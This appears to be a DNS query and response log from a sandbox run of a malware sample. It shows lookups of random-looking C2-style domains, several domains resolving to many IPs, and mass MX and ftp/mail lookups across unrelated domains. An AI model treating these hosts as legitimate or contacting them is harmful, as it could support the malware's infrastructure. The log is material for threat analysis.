                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.512810946 CET192.168.2.61.1.1.10xdbd3Standard query (0)ftp.brevesdunsoir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.513307095 CET192.168.2.61.1.1.10xc120Standard query (0)ftp.bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.513865948 CET192.168.2.61.1.1.10xcafeStandard query (0)bingo.cozaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.514429092 CET192.168.2.61.1.1.10x2cddStandard query (0)ftp.egmaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.514658928 CET192.168.2.61.1.1.10xe73dStandard query (0)ftp.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.515094995 CET192.168.2.61.1.1.10x8da5Standard query (0)ftp.elyashevich.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.515199900 CET192.168.2.61.1.1.10xe871Standard query (0)ssh.elseti.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.515393972 CET192.168.2.61.1.1.10x89daStandard query (0)mail.winstonlf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:46.669958115 CET192.168.2.61.1.1.10x14b9Standard query (0)mail.euromarin.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:34.327243090 CET1.1.1.1192.168.2.60xa258Name error (3)onualituyrs.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:34.629729986 CET1.1.1.1192.168.2.60x601fNo error (0)sumagulituyo.org34.94.245.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:35.216186047 CET1.1.1.1192.168.2.60xf52aNo error (0)snukerukeutit.org104.198.2.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:36.477308035 CET1.1.1.1192.168.2.60x27d5No error (0)lightseinsteniki.org34.143.166.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:38.489531040 CET1.1.1.1192.168.2.60xd636No error (0)liuliuoumumy.org34.143.166.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:40.579668045 CET1.1.1.1192.168.2.60xf84fNo error (0)stualialuyastrelia.net91.215.85.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc14.33.209.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc179.25.56.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc187.134.42.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437474966 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc14.33.209.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc179.25.56.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc187.134.42.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437493086 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc14.33.209.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc179.25.56.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc187.134.42.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc95.158.162.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:50.437504053 CET1.1.1.1192.168.2.60x9f65No error (0)atozrental.cc186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com115.88.24.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com187.134.42.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com190.192.248.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108318090 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com189.232.44.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com115.88.24.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com187.134.42.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com190.192.248.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108331919 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com189.232.44.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com115.88.24.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com187.134.42.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com190.192.248.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com109.175.29.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com211.168.53.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:07:29.108346939 CET1.1.1.1192.168.2.60x4700No error (0)humydrole.com189.232.44.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.747184992 CET1.1.1.1192.168.2.60xebc6Name error (3)elseti.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.747976065 CET1.1.1.1192.168.2.60x93aaName error (3)erofeev.infononenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.748775959 CET1.1.1.1192.168.2.60xa061Name error (3)aopcgaming.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.748806953 CET1.1.1.1192.168.2.60x6981Name error (3)kidj.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.748817921 CET1.1.1.1192.168.2.60x84ebName error (3)mail.tomsknetrunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.748867035 CET1.1.1.1192.168.2.60xf953Name error (3)elyashevich.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.751890898 CET1.1.1.1192.168.2.60x106cName error (3)topbingo-games.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.753320932 CET1.1.1.1192.168.2.60x6f07Name error (3)egmaik.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.784761906 CET1.1.1.1192.168.2.60x11e4Name error (3)bdoxwz.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.786650896 CET1.1.1.1192.168.2.60x1a46Name error (3)noxnoir.dknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.786942005 CET1.1.1.1192.168.2.60xc26aName error (3)bingo.cozanonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.787976027 CET1.1.1.1192.168.2.60x1e0cName error (3)winstonlf.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.805560112 CET1.1.1.1192.168.2.60xd256Name error (3)llefigaro.frnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.807476044 CET1.1.1.1192.168.2.60xb85fNo error (0)conceptualintegration.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.850581884 CET1.1.1.1192.168.2.60x6066No error (0)dune-architecture.beMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.852468967 CET1.1.1.1192.168.2.60x855cName error (3)devbreeze.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.876418114 CET1.1.1.1192.168.2.60xf562No error (0)elohin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.876418114 CET1.1.1.1192.168.2.60xf562No error (0)elohin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.876418114 CET1.1.1.1192.168.2.60xf562No error (0)elohin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.876418114 CET1.1.1.1192.168.2.60xf562No error (0)elohin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.876418114 CET1.1.1.1192.168.2.60xf562No error (0)elohin.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.880081892 CET1.1.1.1192.168.2.60xfb46Name error (3)er.styggnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.888361931 CET1.1.1.1192.168.2.60x5a90No error (0)jumpnsplashwear.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.891983986 CET1.1.1.1192.168.2.60x2c23Name error (3)rabco.benonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.899818897 CET1.1.1.1192.168.2.60x54e0No error (0)fedyanin.wsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.900799036 CET1.1.1.1192.168.2.60x6f54No error (0)mcsmk8.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.919965982 CET1.1.1.1192.168.2.60x7d04Name error (3)my-bingo-games.infononenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.935296059 CET1.1.1.1192.168.2.60x320aNo error (0)exmur.nia.nih.govMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.939661980 CET1.1.1.1192.168.2.60x378aNo error (0)neugear.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.939661980 CET1.1.1.1192.168.2.60x378aNo error (0)neugear.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.939661980 CET1.1.1.1192.168.2.60x378aNo error (0)neugear.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.939661980 CET1.1.1.1192.168.2.60x378aNo error (0)neugear.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.939661980 CET1.1.1.1192.168.2.60x378aNo error (0)neugear.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.964282036 CET1.1.1.1192.168.2.60xd4deNo error (0)evstratov.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.980336905 CET1.1.1.1192.168.2.60x7c41Name error (3)euromarin.esnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.983771086 CET1.1.1.1192.168.2.60x3ef1Name error (3)joslindisplaysinc.cononenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.985690117 CET1.1.1.1192.168.2.60x428bName error (3)brevesdunsoir.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.986789942 CET1.1.1.1192.168.2.60x1c6eName error (3)princessmonty.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.988953114 CET1.1.1.1192.168.2.60xc97No error (0)mgnbizlaw.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.989727020 CET1.1.1.1192.168.2.60xf80aName error (3)bdoxwz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.993073940 CET1.1.1.1192.168.2.60x905aNo error (0)conceptualintegration.com66.115.173.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.993386984 CET1.1.1.1192.168.2.60x2582Name error (3)euromarin.esnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.993732929 CET1.1.1.1192.168.2.60x1638Name error (3)topbingo-games.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:23.994906902 CET1.1.1.1192.168.2.60xdd3dName error (3)egmaik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.009757996 CET1.1.1.1192.168.2.60x37c9No error (0)ace-service.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.011128902 CET1.1.1.1192.168.2.60x94c6Name error (3)cznkqhnq.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.014704943 CET1.1.1.1192.168.2.60x24e6No error (0)eremina.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.034244061 CET1.1.1.1192.168.2.60x7d49No error (0)laachir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.034244061 CET1.1.1.1192.168.2.60x7d49No error (0)laachir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.034244061 CET1.1.1.1192.168.2.60x7d49No error (0)laachir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.034244061 CET1.1.1.1192.168.2.60x7d49No error (0)laachir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.034244061 CET1.1.1.1192.168.2.60x7d49No error (0)laachir.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.048566103 CET1.1.1.1192.168.2.60x5675Name error (3)assiri.tknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.049845934 CET1.1.1.1192.168.2.60xec6aNo error (0)fedyanin.ws64.70.19.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.058505058 CET1.1.1.1192.168.2.60xf013Name error (3)erofeev.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.064502001 CET1.1.1.1192.168.2.60x9fafNo error (0)bokod.huMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.064502001 CET1.1.1.1192.168.2.60x9fafNo error (0)bokod.huMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.082530975 CET1.1.1.1192.168.2.60x31cbName error (3)goexlife.com.brnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.082638979 CET1.1.1.1192.168.2.60xadcName error (3)mlk546gabr.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.095443964 CET1.1.1.1192.168.2.60x686eNo error (0)dune-architecture.be213.186.33.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.096657991 CET1.1.1.1192.168.2.60x162bNo error (0)frametalent.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.102679014 CET1.1.1.1192.168.2.60xac31Name error (3)yahoogabes.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.103451014 CET1.1.1.1192.168.2.60xa279No error (0)3marc.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.105505943 CET1.1.1.1192.168.2.60x6941Name error (3)yoymail.itnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.110759974 CET1.1.1.1192.168.2.60x6feaNo error (0)esn.spb.ru178.210.89.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.122594118 CET1.1.1.1192.168.2.60x8a2fNo error (0)moradfarag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.142395973 CET1.1.1.1192.168.2.60x3315Name error (3)kidj.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.157311916 CET1.1.1.1192.168.2.60xa32dName error (3)mail.tomsknetrunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.160294056 CET1.1.1.1192.168.2.60x535eNo error (0)reign.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.160294056 CET1.1.1.1192.168.2.60x535eNo error (0)reign.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.160294056 CET1.1.1.1192.168.2.60x535eNo error (0)reign.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.160294056 CET1.1.1.1192.168.2.60x535eNo error (0)reign.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.164944887 CET1.1.1.1192.168.2.60xe20fName error (3)aopcgaming.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.168237925 CET1.1.1.1192.168.2.60x205aName error (3)my-bingo-games.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:24.168394089 CET1.1.1.1192.168.2.60x7bf6Name error (3)condorponteggi.itnonenoneMX (Mail exchange)IN (0x0001)false
